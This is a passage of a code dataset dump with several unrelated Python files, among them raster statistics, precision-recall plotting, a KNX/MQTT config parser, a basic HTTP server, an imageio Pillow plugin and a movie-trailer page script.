\"|\".join(x_arrstr)\n\n\t\treturn(vals.tolist())\n\n\n\tdef unique_counts(x):\n\t\t#x = x[~pd.isnull(x)]\n\t\tunique, counts = np.unique(x, return_counts=True)\n\t\t#keep = np.isfinite(unique)\n\t\t#unique_list = unique.tolist()\n\t\t#unique_list = unique[unique != None].to_list()\n\t\treturn({'vals':unique.tolist(), 'counts':counts.tolist()})\n\n\n\t#keep_stats = raster_stats(features, raster_file,stats=['count'])\n\n\t#keep_stats = raster_stats(features, raster_file,stats=stat_array)\n\n\tif \"unique_values\" in stat_array:\n\t\tprint(\"here\")\n\t\tprint(stat_array)\n\t\tstat_array.remove(\"unique_values\")\n\t\tif(len(stat_array)<1):\n\t\t\tstat_array = [\"count\"]\n\t\n\t\tkeep_stats = raster_stats(features, raster_file,stats=stat_array,add_stats={'unique_values':unique_values},all_touched=all_touched_param)\n\telif \"unique_counts\" in stat_array:\n\t\tstat_array.remove(\"unique_counts\")\n\t\tif(len(stat_array)<1):\n\t\t\tstat_array = [\"count\"]\n\n\t\tkeep_stats = raster_stats(features, raster_file,stats=stat_array,add_stats={'unique_counts':unique_counts},all_touched=all_touched_param)\n\telse:\n\t\tkeep_stats = raster_stats(features, raster_file,stats=stat_array,all_touched=all_touched_param)\n\n\t#print(keep_stats[1])\t\n\t#to add your own statistics..\n\t#http://pythonhosted.org/rasterstats/manual.html#zonal-statistics\n\t#keep_stats = raster_stats(features, raster_file,stats=stat_array) #need this to LIST the unique values\n\n\n\t#with rasterio.open(\"nccpi.tif\") as src:\n\t# out_image, out_transform = mask(src, lyr[1], crop=True)\n \n\t#keep_stats = raster_stats(features, \"wut.tif\") #this kinda randomly produces..\n\n\t#TIFFReadDirectory: Warning, Unknown field with tag 42112 (0xa480) encountered.\n\t#TIFFReadDirectory: Warning, Unknown field with tag 42113 (0xa481) encountered.\n\t#Segmentation fault: 11\n\tall_stats.append(keep_stats)\n\n\n\nout_stats = [item for sublist in all_stats for item in sublist]\nwith open(json_output_file, 'w') as outfile:\n json.dump(out_stats, outfile)\n\n\n\n\n#this look really promising\n\n#below could give a bit more control, but need to test\n\n#import rasterio\n#from rasterio.mask import mask\n#import geopandas as gpd #should brew install geopandas?\n#shapefile = gpd.read_file(\"wi_005.shp\")\n# extract the geometry in GeoJSON format\n#geoms = shapefile.geometry.values # list of shapely geometries\n#geometry = geoms[0] # shapely geometry\n# transform to GeJSON format\n#from shapely.geometry import mapping\n#geoms = [mapping(geoms[0])]\n# extract the raster values values within the polygon \n#with rasterio.open(\"nccpi.tif\") as src:\n# out_image, out_transform = mask(src, geoms, crop=True)","sub_path":"Function/Scripts/raster_extraction.py","file_name":"raster_extraction.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"57682305","text":"import os\nimport pandas as pd\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import average_precision_score\nimport matplotlib\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nimport tensorflow as tf\n\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nff = plt.figure()\n\nMODEL = 'cnn'\n\n# result_dir = \"result\"\ndata_dir = \"data/OpenNRE\"\n\ndef PrecisionAtRecall(pAll, rAll, rMark):\n length = len(rAll)\n lo = 0\n hi = length - 1\n mark = length >> 1\n error = rMark - rAll[mark]\n while np.abs(error) > 0.005:\n if error > 0:\n hi = mark - 1\n else:\n lo = mark + 1\n mark = (hi + lo) >> 1\n error = rMark - rAll[mark]\n return pAll[mark], rAll[mark], mark\n\nrel_map = {}\nwith open(os.path.join(data_dir,\"rel2id.txt\"),'r') as f:\n relations = f.readlines()\nfor index,rel in enumerate(relations):\n rel_map[rel.strip()] = index\n\ncolor = ['red', 'turquoise', 'darkorange', 'cornflowerblue', 'teal']\n\ntest_model = ['cnn' + '+sen_att']\ntest_epoch = ['9']\navg_pres = []\nfor temp, (model, step) in enumerate(zip(test_model, test_epoch)):\n y_scores = pd.read_csv(os.path.join(\"data/test_results.tsv\"),delimiter=\"\\t\",header=None).values\n y_true_labels = pd.read_csv(\"data/OpenNRE/test.csv\",delimiter=\"\\t\",header=None)[3].values\n y_true = []\n for label in y_true_labels:\n print(rel_map[label.strip()])\n y_scores = np.argmax(y_scores)\n y_true = tf.one_hot(y_true,len(rel_map))\n y_scores = np.reshape(y_scores, (-1))\n y_true = np.reshape(y_true, (-1))\n precision, recall, threshold = precision_recall_curve(y_true, y_scores)\n average_precision = average_precision_score(y_true, y_scores)\n avg_pres.append(average_precision)\n recall = recall[::-1]\n precision = precision[::-1]\n plt.plot(recall[:], precision[:], lw=2, color=color[1], label=\"baseline\")\n\n# lines_cnn = open('cnn.txt').readlines()\n# lines_cnn = [t.strip().split()[:2] for t in lines_cnn]\n# precision_cnn = np.array([t[0] for t in lines_cnn], dtype=np.float32)\n# recall_cnn = np.array([t[1] for t in lines_cnn], dtype=np.float32)\n# plt.plot(recall_cnn, precision_cnn, lw=2, color=color[-1], label=\"CNN+ATT\")\n#\n# plt.xlabel('Recall')\n# plt.ylabel('Precision')\n# plt.ylim([0.3, 1.0])\n# plt.xlim([0.0, 0.4])\n# plt.title('Precision-Recall Area={0:0.4f}'.format(avg_pres[-1]))\n# plt.legend(loc=\"upper right\")\n# plt.grid(True)\n# plt.savefig('sgd_' + MODEL)\n# plt.plot(range(10), range(10), \"o\")\n# plt.show()\n# ff.savefig(\"pr.pdf\", bbox_inches='tight')\n","sub_path":"draw_plot.py","file_name":"draw_plot.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"64742217","text":"import yaml\nimport logging\nimport logging.config\n\n\nclass Config:\n\t\"\"\"Class for parsing knx2mqtt.yaml.\"\"\"\n\t\n\tdef __init__(self, file='logging.conf'):\n\t\t\"\"\"Initialize Config class.\"\"\"\n\t\tlogging.debug(\"Reading %s\", file)\n\t\ttry:\n\t\t\twith open(file, 'r') as f:\n\t\t\t\tD = yaml.load(f, Loader=yaml.SafeLoader)\n\t\t\t\tD.setdefault('version', 1)\n\t\t\t\tlogging.config.dictConfig(D)\n\t\t\tself._mqtt = {}\n\t\t\tself._knx = {}\n\t\texcept FileNotFoundError as ex:\n\t\t\tlogging.error(\"Logging configuration file %s not found: %s\", file, ex)\n\t\t\texit(ex.errno)\n\t\n\t\n\tdef read(self, file='knx2mqtt.yaml'):\n\t\t\"\"\"Read config.\"\"\"\n\t\tlogging.debug(\"Reading %s\", file)\n\t\ttry:\n\t\t\twith open(file, 'r') as filehandle:\n\t\t\t\tconfig = yaml.load(filehandle, Loader=yaml.SafeLoader)\n\t\t\t\tself._parse_mqtt(config)\n\t\t\t\tself._parse_knx(config)\n\t\texcept FileNotFoundError as ex:\n\t\t\tlogging.error(\"Configuration file %s not found: %s\", file, ex)\n\t\t\texit(ex.errno)\n\n\n\tdef _parse_mqtt(self, config):\n\t\t\"\"\"Parse the mqtt section of knx2mqtt.yaml.\"\"\"\n\t\tif \"mqtt\" in config:\n\t\t\tself._mqtt = config[\"mqtt\"]\n\n\t\t\tif not \"client_id\" in self._mqtt:\n\t\t\t\tself._mqtt[\"client_id\"] = \"knx2mqtt\"\n\t\t\tif not \"host\" in self._mqtt:\n\t\t\t\traise ValueError(\"MQTT host not set\")\n\t\t\tif not \"port\" in self._mqtt:\n\t\t\t\tself._mqtt[\"port\"] = 1883\n\t\t\tif not \"user\" in self._mqtt:\n\t\t\t\tself._mqtt[\"user\"] = \"\"\n\t\t\tif not \"password\" in self._mqtt:\n\t\t\t\tself._mqtt[\"password\"] = \"\"\n\t\t\tif not \"topic\" in self._mqtt:\n\t\t\t\traise ValueError(\"MQTT topic not set\")\n\t\t\tif not \"qos\" in self._mqtt:\n\t\t\t\tself._mqtt[\"qos\"] = 0\n\t\t\tif not \"retain\" in self._mqtt:\n\t\t\t\tself._mqtt[\"retain\"] = False\n\t\t\tif not \"keepalive\" in self._mqtt:\n\t\t\t\tself._mqtt[\"keepalive\"] = 60\n\n\t\telse:\n\t\t\tlogging.error(\"MQTT configuration not found in configuration file.\")\n\t\t\texit(1)\n\n\n\tdef _parse_knx(self, config):\n\t\t\"\"\"Parse the knx section of knx2mqtt.yaml.\"\"\"\n\t\tif \"knx\" in config:\n\t\t\tself._knx = config[\"knx\"]\n\n\t\t\tif \"sensors\" in self._knx:\n\t\t\t\tfor item in self._knx[\"sensors\"]:\n\t\t\t\t\tif not \"address\" in item:\n\t\t\t\t\t\traise ValueError(\"Missing address for KNX sensor\")\n\t\t\telse:\n\t\t\t\tself._knx[\"sensors\"] = []\n\n\t\t\tif \"switches\" in self._knx:\n\t\t\t\tfor item in self._knx[\"switches\"]:\n\t\t\t\t\tif not \"address\" in item:\n\t\t\t\t\t\traise ValueError(\"Missing address for KNX switch\")\n\t\t\telse:\n\t\t\t\tself._knx[\"switches\"] = []\n\n\t\telse:\n\t\t\tlogging.error(\"KNX configuration not found in configuration file.\")\n\t\t\texit(1)\n\n\n\tdef mqtt(self):\n\t\treturn self._mqtt\n\n\tdef knx(self):\n\t\treturn self._knx\n","sub_path":"knx2mqtt/knx2mqtt/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"250443577","text":"# 4.22: Match on date format YYYY-MM-DD.\n\nimport runreport\n\nimport re\n\ndirlist = ('.', '..', '2010-12-15.txt', '2010-12-16.txt',\n 'testfile.txt', '20101-11-03.txt')\n\nfor item in dirlist:\n if re.search(r'', item):\n print(item)\n\n# Expected Output:\n\n# 2010-12-15.txt\n# 2010-12-16.txt\n\n","sub_path":"session_04_working_files/inclass_exercises/inclass_4.22_lab.py","file_name":"inclass_4.22_lab.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"568994494","text":"from django.urls import include, path\r\nfrom . import views\r\n\r\n# Wire up our API using automatic URL routing.\r\n# Additionally, we include login URLs for the browsable API.\r\nurlpatterns = [\r\n path('enviar_imagem/', views.ImagemUpload.as_view()),\r\n path('registrar_ferramenta/', views.SalvaAnalisada.as_view()),\r\n path('analisa_imagem/', views.AnalisaFerramenta.as_view()),\r\n path('receber_numero/', views.NumeroProcesso.as_view()),\r\n path('listar/<id_usuario>/', views.ListaRegistros.as_view())\r\n]\r\n","sub_path":"Back-End/APIs/projetoapi/APP/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"164580488","text":"\"\"\"\nмодуль, реализующий http сервер\n\"\"\"\n\nfrom interfaces.threaded.i_server import IServer\nfrom base_errors.http_errors import HTTPError\nfrom email.parser import Parser\nfrom implementations.my_flask_thread.response import Response\nfrom implementations.my_flask_thread.request import Request\nfrom datetime import datetime\nimport threading\n\n\nclass HTTPServer(IServer):\n\n _MAX_LINE = 64 * 1024 # http протокол не обязывает ограничивать длинну строк реквест лайна,\n # но обычно сервера ограничивают\n _MAX_HEADERS = 100 # в целом http протокол не обязывает ограничивать длинну хидера, но обычно сервера ограничивают\n\n def __init__(self, host_name, port_id, server_name, request, response):\n super().__init__(host_name, port_id, server_name, request, response)\n\n def _parse_request(self, conn):\n \"\"\"\n разбор запроса от клиента\n :param conn: сокет\n :return: объект запроса\n \"\"\"\n\n _rfile = conn.makefile('rb')\n method, target, ver = self._parse_request_line(_rfile)\n headers = self._parse_headers(_rfile)\n host = headers.get('Host')\n if not host:\n raise Exception('Bad request')\n if host not in (self.server_name, f'{self.server_name}:{self.port}'):\n raise HTTPError(404, 'Not found')\n _request = Request()\n _request.set_data(method, target, ver, headers, _rfile)\n return _request\n\n def _parse_request_line(self, conn):\n \"\"\"\n разбор реквест лайна\n :conn: подключение к сокету\n :return: метод запроса, путь запроса, версия протокола\n \"\"\"\n raw = conn.readline(HTTPServer._MAX_LINE + 1)\n\n if len(raw) > HTTPServer._MAX_LINE:\n raise Exception('Request line is too long')\n\n req_line = str(raw, 'iso-8859-1')\n req_line = req_line.rstrip('\\r\\n')\n params = req_line.split()\n\n if len(params) != 3:\n raise Exception('Incorrect request line')\n\n method, target, ver = params\n\n # реализована поддержка толкьо версии 1.1\n if ver != 'HTTP/1.1':\n raise Exception('Unexpected HTTP version')\n\n return method, target, ver\n\n def _parse_headers(self, conn):\n \"\"\"\n разбор заголовков\n :conn: подключение к сокету\n :return: объект, содержащий заголовки\n \"\"\"\n headers = []\n while True:\n line = conn.readline(HTTPServer._MAX_LINE + 1)\n if len(line) > HTTPServer._MAX_LINE:\n raise Exception('Header line is too long')\n\n # проверка на окончание блока с заголовками\n if line in (b'\\r\\n', b'\\n', b''):\n break\n\n headers.append(line)\n if len(headers) > HTTPServer._MAX_HEADERS:\n raise Exception('Too many headers')\n\n str_headers = b''.join(headers).decode('iso-8859-1')\n return Parser().parsestr(str_headers)\n\n def _handle_request(self, request):\n \"\"\"\n обработка запроса от клиента\n метод имеет поведение по умолчанию, которое необходимо переопределить бизнес логикой\n :request: объект запроса\n :return: данные для клиента\n \"\"\"\n response = Response()\n response.set_data(200, 'OK')\n return response\n\n def _send_response(self, conn, response):\n \"\"\"\n Отправка ответа клиенту\n :param conn: сокет\n :param response: объект ответа\n \"\"\"\n\n wfile = conn.makefile('wb')\n status_line = f'HTTP/1.1 {response.status} {response.reason}\\r\\n'\n\n wfile.write(status_line.encode('iso-8859-1'))\n\n if response.headers:\n for (key, value) in response.headers:\n header_line = f'{key}: {value}\\r\\n'\n wfile.write(header_line.encode('iso-8859-1'))\n\n wfile.write(b'\\r\\n')\n\n if response.body:\n wfile.write(response.body)\n\n wfile.flush()\n wfile.close()\n\n def _send_error(self, conn, err):\n \"\"\"\n конструирование объекта ошибки и его отправка\n :param conn: сокет\n :param err: ошибка\n \"\"\"\n try:\n status = err.status\n reason = err.reason\n body = (err.body or err.reason).encode('utf-8')\n except:\n status = 500\n reason = b'Internal Server Error'\n body = b'Internal Server Error'\n response = Response()\n response.set_data(status, reason, [('Content-Length', len(body))], body)\n self._send_response(conn, response)\n","sub_path":"implementations/my_flask_thread/http_server/http_server.py","file_name":"http_server.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"35626815","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\ninstall_requirements = [\n 'sqlalchemy',\n 'numpy',\n 'textblob',\n 'vaderSentiment',\n 'pandas',\n 'newsapi-python',\n 'python-dateutil',\n 'requests',\n 'bs4',\n 'scrapy',\n 'python-dotenv',\n]\n\nsetuptools.setup(\n name=\"senti-news\",\n version=\"0.0.38\",\n author=\"Nicholas Broad\",\n author_email=\"nicholas@nmbroad.com\",\n description=\"News title sentiment analysis\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/nbroad1881/senti-news\",\n packages=setuptools.find_packages(where='src/'),\n package_dir={'': 'src'},\n install_requires=install_requirements,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","sub_path":"senti-news/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"221025827","text":"# -*- coding: utf-8 -*-\n# imageio is distributed under the terms of the (new) BSD License.\n\n\"\"\" Read/Write images using Pillow/PIL.\n\nBackend Library: `Pillow <https://pillow.readthedocs.io/en/stable/>`_\n\nPlugin that wraps the the Pillow library. Pillow is a friendly fork of PIL\n(Python Image Library) and supports reading and writing of common formats (jpg,\npng, gif, tiff, ...). For, the complete list of features and supported formats\nplease refer to pillows official docs (see the Backend Library link).\n\nParameters\n----------\nrequest : Request\n A request object representing the resource to be operated on.\n\nMethods\n-------\n\n.. autosummary::\n :toctree: _plugins/pillow\n\n PillowPlugin.read\n PillowPlugin.write\n PillowPlugin.iter\n PillowPlugin.get_meta\n\n\"\"\"\n\nfrom io import BytesIO\nfrom typing import Callable, Optional, Dict, Any, Tuple, cast, Iterator, Union, List\nimport numpy as np\nfrom PIL import Image, UnidentifiedImageError, ImageSequence, ExifTags # type: ignore\nfrom ..core.request import Request, IOMode, InitializationError, URI_BYTES\nfrom ..core.v3_plugin_api import PluginV3, ImageProperties\nimport warnings\nfrom ..typing import ArrayLike\n\n\ndef _exif_orientation_transform(orientation: int, mode: str) -> Callable:\n # get transformation that transforms an image from a\n # given EXIF orientation into the standard orientation\n\n # -1 if the mode has color channel, 0 otherwise\n axis = -2 if Image.getmodebands(mode) > 1 else -1\n\n EXIF_ORIENTATION = {\n 1: lambda x: x,\n 2: lambda x: np.flip(x, axis=axis),\n 3: lambda x: np.rot90(x, k=2),\n 4: lambda x: np.flip(x, axis=axis - 1),\n 5: lambda x: np.flip(np.rot90(x, k=3), axis=axis),\n 6: lambda x: np.rot90(x, k=1),\n 7: lambda x: np.flip(np.rot90(x, k=1), axis=axis),\n 8: lambda x: np.rot90(x, k=3),\n }\n\n return EXIF_ORIENTATION[orientation]\n\n\nclass PillowPlugin(PluginV3):\n def __init__(self, request: Request) -> None:\n \"\"\"Instantiate a new Pillow Plugin Object\n\n Parameters\n ----------\n request : {Request}\n A request object representing the resource to be operated on.\n\n \"\"\"\n\n super().__init__(request)\n\n self._image: Image = None\n\n if request.mode.io_mode == IOMode.read:\n try:\n with Image.open(request.get_file()):\n # Check if it is generally possible to read the image.\n # This will not read any data and merely try to find a\n # compatible pillow plugin (ref: the pillow docs).\n pass\n except UnidentifiedImageError:\n if request._uri_type == URI_BYTES:\n raise InitializationError(\n \"Pillow can not read the provided bytes.\"\n ) from None\n else:\n raise InitializationError(\n f\"Pillow can not read {request.raw_uri}.\"\n ) from None\n\n self._image = Image.open(self._request.get_file())\n else:\n extension = self.request.extension or self.request.format_hint\n if extension is None:\n warnings.warn(\n \"Can't determine file format to write as. You _must_\"\n \" set `format` during write or the call will fail. Use \"\n \"`extension` to supress this warning. \",\n UserWarning,\n )\n return\n\n tirage = [Image.preinit, Image.init]\n for format_loader in tirage:\n format_loader()\n if extension in Image.registered_extensions().keys():\n return\n\n raise InitializationError(\n f\"Pillow can not write `{extension}` files.\"\n ) from None\n\n def close(self) -> None:\n if self._image:\n self._image.close()\n\n self._request.finish()\n\n def read(\n self, *, index=None, mode=None, rotate=False, apply_gamma=False, as_gray=None\n ) -> np.ndarray:\n \"\"\"\n Parses the given URI and creates a ndarray from it.\n\n Parameters\n ----------\n index : int\n If the ImageResource contains multiple ndimages, and index is an\n integer, select the index-th ndimage from among them and return it.\n If index is an ellipsis (...), read all ndimages in the file and\n stack them along a new batch dimension and return them. If index is\n None, this plugin reads the first image of the file (index=0) unless\n the image is a GIF or APNG, in which case all images are read\n (index=...).\n mode : str\n Convert the image to the given mode before returning it. If None,\n the mode will be left unchanged. Possible modes can be found at:\n https://pillow.readthedocs.io/en/stable/handbook/concepts.html#modes\n rotate : bool\n If set to ``True`` and the image contains an EXIF orientation tag,\n apply the orientation before returning the ndimage.\n apply_gamma : bool\n If ``True`` and the image contains metadata about gamma, apply gamma\n correction to the image.\n as_gray : bool\n Deprecated. Exists to raise a constructive error message.\n\n Returns\n -------\n ndimage : ndarray\n A numpy array containing the loaded image data\n\n Notes\n -----\n If you open a GIF - or any other format using color pallets - you may\n wish to manually set the `mode` parameter. Otherwise, the numbers in\n the returned image will refer to the entries in the color pallet, which\n is discarded during conversion to ndarray.\n\n \"\"\"\n\n if as_gray is not None:\n raise TypeError(\n \"The keyword `as_gray` is no longer supported.\"\n \"Use `mode='L'` instead.\"\n )\n\n if index is None:\n if self._image.format == \"GIF\":\n index = Ellipsis\n elif self._image.custom_mimetype == \"image/apng\":\n index = Ellipsis\n else:\n index = 0\n\n if isinstance(index, int):\n # will raise IO error if index >= number of frames in image\n self._image.seek(index)\n image = self._apply_transforms(self._image, mode, rotate, apply_gamma)\n return image\n else:\n iterator = self.iter(mode=mode, rotate=rotate, apply_gamma=apply_gamma)\n image = np.stack([im for im in iterator], axis=0)\n return image\n\n def iter(\n self, *, mode: str = None, rotate: bool = False, apply_gamma: bool = False\n ) -> Iterator[np.ndarray]:\n \"\"\"\n Iterate over all ndimages/frames in the URI\n\n Parameters\n ----------\n mode : {str, None}\n Convert the image to the given mode before returning it. If None,\n the mode will be left unchanged. Possible modes can be found at:\n https://pillow.readthedocs.io/en/stable/handbook/concepts.html#modes\n rotate : {bool}\n If set to ``True`` and the image contains an EXIF orientation tag,\n apply the orientation before returning the ndimage.\n apply_gamma : {bool}\n If ``True`` and the image contains metadata about gamma, apply gamma\n correction to the image.\n \"\"\"\n\n for im in ImageSequence.Iterator(self._image):\n yield self._apply_transforms(im, mode, rotate, apply_gamma)\n\n def _apply_transforms(self, image, mode, rotate, apply_gamma) -> np.ndarray:\n if mode is not None:\n image = image.convert(mode)\n elif image.format == \"GIF\":\n # adjust for pillow9 changes\n # see: https://github.com/python-pillow/Pillow/issues/5929\n image = image.convert(image.palette.mode)\n image = np.asarray(image)\n\n meta = self.metadata(index=self._image.tell(), exclude_applied=False)\n if rotate and \"Orientation\" in meta:\n transformation = _exif_orientation_transform(\n meta[\"Orientation\"], self._image.mode\n )\n image = transformation(image)\n\n if apply_gamma and \"gamma\" in meta:\n gamma = float(meta[\"gamma\"])\n scale = float(65536 if image.dtype == np.uint16 else 255)\n gain = 1.0\n image = ((image / scale) ** gamma) * scale * gain + 0.4999\n image = np.round(image).astype(np.uint8)\n\n return image\n\n def write(\n self,\n ndimage: Union[ArrayLike, List[ArrayLike]],\n *,\n mode: str = None,\n format: str = None,\n is_batch: bool = None,\n **kwargs,\n ) -> Optional[bytes]:\n \"\"\"\n Write an ndimage to the URI specified in path.\n\n If the URI points to a file on the current host and the file does not\n yet exist it will be created. If the file exists already, it will be\n appended if possible; otherwise, it will be replaced.\n\n If necessary, the image is broken down along the leading dimension to\n fit into individual frames of the chosen format. If the format doesn't\n support multiple frames, and IOError is raised.\n\n Parameters\n ----------\n image : ndarray or list\n The ndimage to write. If a list is given each element is expected to\n be an ndimage.\n mode : str\n Specify the image's color format. If None (default), the mode is\n inferred from the array's shape and dtype. Possible modes can be\n found at:\n https://pillow.readthedocs.io/en/stable/handbook/concepts.html#modes\n format : str\n Optional format override. If omitted, the format to use is\n determined from the filename extension. If a file object was used\n instead of a filename, this parameter must always be used.\n is_batch : bool\n Explicitly tell the writer that ``image`` is a batch of images\n (True) or not (False). If None, the writer will guess this from the\n provided ``mode`` or ``image.shape``. While the latter often works,\n it may cause problems for small images due to aliasing of spatial\n and color-channel axes.\n kwargs : ...\n Extra arguments to pass to pillow. If a writer doesn't recognise an\n option, it is silently ignored. The available options are described\n in pillow's `image format documentation\n <https://pillow.readthedocs.io/en/stable/handbook/image-file-formats.html>`_\n for each writer.\n\n Notes\n -----\n When writing batches of very narrow (2-4 pixels wide) gray images set\n the ``mode`` explicitly to avoid the batch being identified as a colored\n image.\n\n \"\"\"\n if \"fps\" in kwargs:\n raise TypeError(\n \"The keyword `fps` is no longer supported. Use `duration`\"\n \"(in ms) instead, e.g. `fps=50` == `duration=20` (1000 * 1/50).\"\n )\n\n extension = self.request.extension or self.request.format_hint\n\n save_args = {\n \"format\": format or Image.registered_extensions()[extension],\n }\n\n if isinstance(ndimage, list):\n ndimage = np.stack(ndimage, axis=0)\n is_batch = True\n else:\n ndimage = np.asarray(ndimage)\n\n # check if ndimage is a batch of frames/pages (e.g. for writing GIF)\n # if mode is given, use it; otherwise fall back to image.ndim only\n if is_batch is not None:\n pass\n elif mode is not None:\n is_batch = (\n ndimage.ndim > 3 if Image.getmodebands(mode) > 1 else ndimage.ndim > 2\n )\n elif ndimage.ndim == 2:\n is_batch = False\n elif ndimage.ndim == 3 and ndimage.shape[-1] == 1:\n raise ValueError(\"Can't write images with one color channel.\")\n elif ndimage.ndim == 3 and ndimage.shape[-1] in [2, 3, 4]:\n # Note: this makes a channel-last assumption\n is_batch = False\n else:\n is_batch = True\n\n if not is_batch:\n ndimage = ndimage[None, ...]\n\n pil_frames = list()\n for frame in ndimage:\n pil_frame = Image.fromarray(frame, mode=mode)\n if \"bits\" in kwargs:\n pil_frame = pil_frame.quantize(colors=2 ** kwargs[\"bits\"])\n pil_frames.append(pil_frame)\n primary_image, other_images = pil_frames[0], pil_frames[1:]\n\n if is_batch:\n save_args[\"save_all\"] = True\n save_args[\"append_images\"] = other_images\n\n save_args.update(kwargs)\n primary_image.save(self._request.get_file(), **save_args)\n\n if self._request._uri_type == URI_BYTES:\n file = cast(BytesIO, self._request.get_file())\n return file.getvalue()\n\n return None\n\n def get_meta(self, *, index=0) -> Dict[str, Any]:\n return self.metadata(index=index, exclude_applied=False)\n\n def metadata(\n self, index: int = None, exclude_applied: bool = True\n ) -> Dict[str, Any]:\n \"\"\"Read ndimage metadata.\n\n Parameters\n ----------\n index : {integer, None}\n If the ImageResource contains multiple ndimages, and index is an\n integer, select the index-th ndimage from among them and return its\n metadata. If index is an ellipsis (...), read and return global\n metadata. If index is None, this plugin reads metadata from the\n first image of the file (index=0) unless the image is a GIF or APNG,\n in which case global metadata is read (index=...).\n\n Returns\n -------\n metadata : dict\n A dictionary of format-specific metadata.\n\n \"\"\"\n\n if index is None:\n if self._image.format == \"GIF\":\n index = Ellipsis\n elif self._image.custom_mimetype == \"image/apng\":\n index = Ellipsis\n else:\n index = 0\n\n if isinstance(index, int) and self._image.tell() != index:\n self._image.seek(index)\n\n metadata = self._image.info.copy()\n metadata[\"mode\"] = self._image.mode\n metadata[\"shape\"] = self._image.size\n\n if self._image.mode == \"P\":\n metadata[\"palette\"] = self._image.palette\n\n if self._image.getexif():\n exif_data = {\n ExifTags.TAGS.get(key, \"unknown\"): value\n for key, value in dict(self._image.getexif()).items()\n }\n exif_data.pop(\"unknown\", None)\n metadata.update(exif_data)\n\n if exclude_applied:\n metadata.pop(\"Orientation\", None)\n\n return metadata\n\n def properties(self, index: int = None) -> ImageProperties:\n \"\"\"Standardized ndimage metadata\n Parameters\n ----------\n index : int\n If the ImageResource contains multiple ndimages, and index is an\n integer, select the index-th ndimage from among them and return its\n properties. If index is an ellipsis (...), read and return the\n properties of all ndimages in the file stacked along a new batch\n dimension. If index is None, this plugin reads and returns the\n properties of the first image (index=0) unless the image is a GIF or\n APNG, in which case it reads and returns the properties all images\n (index=...).\n\n Returns\n -------\n properties : ImageProperties\n A dataclass filled with standardized image metadata.\n\n Notes\n -----\n This does not decode pixel data and is 394fast for large images.\n\n \"\"\"\n\n if index is None:\n if self._image.format == \"GIF\":\n index = Ellipsis\n elif self._image.custom_mimetype == \"image/apng\":\n index = Ellipsis\n else:\n index = 0\n\n if index is Ellipsis:\n self._image.seek(0)\n else:\n self._image.seek(index)\n\n if self._image.format == \"GIF\":\n # GIF mode is determined by pallette\n mode = self._image.palette.mode\n else:\n mode = self._image.mode\n\n width: int = self._image.width\n height: int = self._image.height\n shape: Tuple[int, ...] = (height, width)\n\n n_frames: int = self._image.n_frames\n if index is ...:\n shape = (n_frames, *shape)\n\n dummy = np.asarray(Image.new(mode, (1, 1)))\n pil_shape: Tuple[int, ...] = dummy.shape\n if len(pil_shape) > 2:\n shape = (*shape, *pil_shape[2:])\n\n return ImageProperties(\n shape=shape,\n dtype=dummy.dtype,\n is_batch=True if index is Ellipsis else False,\n )\n","sub_path":"imageio/plugins/pillow.py","file_name":"pillow.py","file_ext":"py","file_size_in_byte":17088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"651563600","text":"import fresh_tomatoes\nimport media\n\n\n# This section is used to initialize the values for each movie\n\ntoy_story = media.Movie(\"Toy Story\",\n \"A story of a body and his toys that come to life\",\n \"http://upload.wikimedia.org\"\n \"/wikipedia/en/1/13/Toy_Story.jpg\",\n \"https://www.youtube.com/watch?v=Ny_hRfvsmU8\")\n\n\navatar = media.Movie(\"Avatar\",\n \"A marine on an alien planet\",\n \"http://upload.wikimedia.org/wikipedia/id/b/b0\"\n \"/Avatar-Teaser-Poster.jpg\",\n \"http://www.youtube.com/watch?v=5PSNL1qE6VY\")\n\n\nschool_of_rock = media.Movie(\"School of Rock\",\n \"Dewey Finn poses as a substitute teacher\",\n \"http://upload.wikimedia.org/wikipedia/en/1/11\"\n \"/School_of_Rock_Poster.jpg\",\n \"https://www.youtube.com/watch?v=3PsUJFEBC74\")\n\n\nhunger_games = media.Movie(\"Hunger Games\",\n \"A really real reality show\",\n \"https://upload.wikimedia.org/wikipedia/en/4/42\"\n \"/HungerGamesPoster.jpg\",\n \"https://www.youtube.com/watch?v=PbA63a7H0bo\")\n\n\nmad_max_fury_road = media.Movie(\"Mad Max Fury Road\",\n \"IStory of Max and Furiosa\",\n \"https://encrypted-tbn3.gstatic.com\"\n \"/images?q=tbn:ANd9GcSY9szIPbtk1-hwxdEVRJIHT_\"\n \"pgYGNnFkFSWsCjlKFGP3Pu77Oo\",\n \"https://www.youtube.com/watch?v=YWNWi-ZWL3c\")\n\n\nratatouille = media.Movie(\"Ratatouille\",\n \"A rat is a chef in Paris\",\n \"https://upload.wikimedia.org/wikipedia/en/5/50\"\n \"/RatatouillePoster.jpg\",\n \"https://www.youtube.com/watch?v=c3sBBRxDAqk\")\n\n# Use the \"open_movies_page\" function to\n# create and open an html webpage or website that shows those movies\n\nmovies = [toy_story, avatar, school_of_rock,\n hunger_games, mad_max_fury_road, 